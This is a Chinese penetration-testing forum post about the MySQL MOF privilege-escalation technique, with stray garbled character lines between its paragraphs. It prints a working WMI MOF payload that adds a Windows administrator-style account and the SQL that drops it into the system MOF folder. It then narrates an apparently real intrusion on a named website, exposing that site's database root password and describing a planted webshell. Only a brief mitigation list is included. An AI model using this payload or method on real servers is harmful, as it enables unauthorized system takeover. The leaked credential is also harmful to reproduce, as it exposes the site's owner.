中国网络渗透测试联盟
标题:
Mysql mof扩展漏洞实例与防范
[打印本页]
作者:
admin
时间:
2013-1-4 19:49
标题:
Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
) w! @2 N8 ?3 D. U( K( ]
* [: b* G# O; i7 F
网上公开的一些利用代码:
( D) x. x; o! l# o
0 K+ v z* S+ y3 C3 W
#pragma namespace(“\\\\.\\root\\subscription”)
# G8 a$ C8 X6 o# G8 x
' F; ~1 V% v/ ~: w" K( P/ g
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
! X3 U& G$ b% @* i+ P
8 R: k. s" E8 |/ e- r* R
7 z: g6 U! M" L) j" f R
0 h! `3 j) m+ p& h9 ? o
* k- I: ]4 A% L/ }& C0 a0 ]- p; \) k
) m* @7 p9 H4 _+ Y
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
4 R5 ?5 L3 v8 S
从上面代码来看得出解决办法:
, P8 V! w' P$ T- H
# Q' V& d' N( F% Y2 U8 J9 I$ @% S
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
4 V# Y% ~- I3 U
7 t y- ]! f7 Y$ {' L* [
2、禁止使用”WScript.Shel”组件
3 P5 c+ B. e( h" X* ]0 n/ ]$ V" L
$ G; c8 @: C" [' A4 m! b# t
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
$ m7 l$ e9 l& ~" j' A" o* B
! O3 T1 M. Y A
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
0 I6 I' _" }5 S! c' y. {
7 |, @, ]5 U" Q% r! N
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
l" O1 c' H1 Z! p; g/ k
, R5 f: h7 j9 G7 K" A x
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
0 D6 K+ L: I3 B% e9 F# d, @. F
) E. ?& J0 g' P# v5 Q5 j
看懂了后就开始练手吧
1 R# i& w9 h! B: o6 H
. v+ E8 M, c8 M# F d" ~
http://www.webbmw.com/config/config_ucenter.php
一句话 a
8 d6 W# R0 b3 h1 R6 g
; Y6 e0 u: X# `
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
+ ?2 t7 D+ |- z4 k- _7 e
7 M9 `) j! X8 H! Q
于是直接用菜刀开搞
- I. l4 J7 g, N8 _6 r
3 }0 i$ j# J( E& s6 _" P
上马先
: m. v) I' V9 g9 C% k" v
0 b; l) b7 v# O
既然有了那些账号 之类的 于是我们就执行吧…….
1 Z" o5 U+ B, ]6 ?% Y% O
6 X. ^" f6 v% \( M8 |2 z0 ]
小小的说下
. J- ~9 ^6 U+ z+ E6 e# ^
, B8 T. I# ~( H( E+ {& {; |8 n4 F
在这里第1次执行未成功 原因未知
8 w: t9 e6 E/ p- i6 {
+ l8 y; g+ j2 R" S( W' F3 D
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
: R2 P9 \$ Q9 o4 D. t: K4 E, \9 ]
! P: U; |2 r3 ? j$ Q" R0 Q+ A0 X
#pragma namespace(“\\\\.\\root\\subscription”)
6 @ s- j- Q5 b
+ e8 ~) i' ^. Z* n5 u3 T( Z% K
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
( `* G) Q( i" _1 x/ u
8 O9 U) T9 f& d& J
我是将文件放到C:\WINDOWS\temp\1.mof
; s/ Y Z* U5 X. k& h
& l# e7 r; f1 p, o% X* N5 [0 n
所以我们就改下执行的代码
$ ^- ]( _ e- z9 x4 j
9 t1 f4 F9 K4 X
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
; ?$ r6 p/ n- e0 I2 o3 D' Z& u
- g2 T6 `' k8 }4 T9 \
+ s9 ~* f* G; m
1 [9 }7 R8 x" }9 X4 \
但是 你会发现账号还是没有躺在那里。。
2 U- C5 W- `! y; N! } p# M
8 q0 i% f- K3 ~2 C( a! ^5 ?
于是我就感觉蛋疼
0 E: O4 ], | [" a; ~1 t% D
$ l$ r% _! J% \/ u, G
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
# L1 `" {6 q% T
5 V7 i3 f3 ]1 ]! ]. O. c
& ]* j- a5 n/ _# t/ R/ u* |; p q; S+ O
# w9 H( S4 s6 W' `5 Y+ J7 Q
但是其他库均不成功…
; T- ` g4 E3 c' X% Q
3 `+ I' W# L: M* j5 }& ?3 z
我就很费解呀 到底为什么不成功求大牛解答…
" o2 U# g+ j% b! [' r
8 y5 H% W. f# m: C
1 [( W& n0 y6 d; [$ V& u3 S2 h
) B, ^1 o3 L9 p
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2